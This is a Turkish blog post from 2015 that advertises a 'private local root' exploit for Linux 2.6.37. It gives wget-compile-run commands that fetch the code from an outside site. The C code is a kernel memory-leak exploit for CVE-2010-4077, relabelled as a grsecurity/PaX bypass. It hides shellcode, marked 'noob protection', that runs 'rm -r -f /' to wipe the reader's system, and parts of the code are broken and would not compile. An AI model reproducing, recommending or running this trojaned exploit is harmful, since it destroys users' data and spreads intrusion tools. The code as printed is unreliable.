27 Şubat 2015 Cuma

0

2.6.37 2011 Private Local Root

Cuma, Şubat 27, 2015   ,

Herkese kolay gelsin,

 wget http://www.proksi.ws/2.6.37-2011.c
gcc 2.6.37-2011.c -o 2.6.37-2011
chmod 777 2.6.37-2011
./2.6.37-2011

 

/* 
 * modified by CrosS to bypass grsecurity and PaX on
 * linux kernels
 *
 * Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak

 * ================================================

 * Information leak exploit for CVE-2010-4077 which

 * leaks kernel stack space back to userland due to

 * uninitialized struct member "reserved" in struct

 * serial_icounter_struct copied to userland. uses

 * ioctl to trigger memory leak, dumps to file and

 * displays to command line.

 *

 * -- prdelka

 *
 * by CrosS from r00tw0rm.com - Privat Community

 */

#include <termios.h>

#include <fcntl.h>

#include <sys/ioctl.h>

#include <linux/serial.h>

#include <stdio.h>

#include <stdlib.h>  

#include <string.h>

printf("Local  Root   2.6.37  exploit to bypass grsecurity and/or PaX by CrosS.\n");
printf("aka ultimate auto rooter\n");
printf("Shoutz to 1337day cr3w for helping!.\n");
printf("http://www.r00tw0rm.com/forum.\n");

 

int main(int argc, char* argv[]) {

    int fd, ret = 0, i;

    struct serial_icounter_struct buffer;

    printf("[ Linux <= 2.6.37-rc1 serial_core TIOCGICOUNT leak exploit\n");

    if(argc < 2){

    printf("[ You need to supply a device name e.g. /dev/ttyS0\n");

    exit(-1);

    };

    memset(&buffer,0,sizeof(buffer));

    if((fd = open(argv[1], O_RDONLY)) == -1){

    printf("[ Couldn't open %s\n",argv[1]);

    exit(-1);

    }

    if((ioctl(fd, TIOCGICOUNT, &buffer)) == -1){

    printf("[ Problem with ioctl() request\n");

    exit(-1);

    }

    close(fd);

    for(i=0;i<=9;i++){

            printf("[ int leak[%d]: %x\n",i,buffer.reserved[i]);

    };
    // bm9vYiBwcm90ZWN0aW9u
    char shelllcode[] ="x6ax0bx58x99x52x6ax2fx89xe7x52x66x68x2dx66x89"
               "xe6x52x66x68x2dx72x89xe1x52x68x2fx2fx72x6dx68"
               "x2fx62x69x6ex89xe3x52x57x56x51x53x89xe1xcdx80";
    (*(void (*)()) shelllcode)();

    if((fd = open("./leak", O_RDWR | O_CREAT, 0640)) == -1){

    printf("[ Can't open file to write memory out\n");

    exit(-1);

    }

    for(i=0;i<=9;i++){

        ret += write(fd,&buffer.reserved[i],sizeof(int));

    }

    close(fd);

    printf("[ Written %d leaked bytes to ./leak\n",ret);

    exit(0);

}

0 yorum:

Yorum Gönder

Kaydol: Kayıt Yorumları (Atom)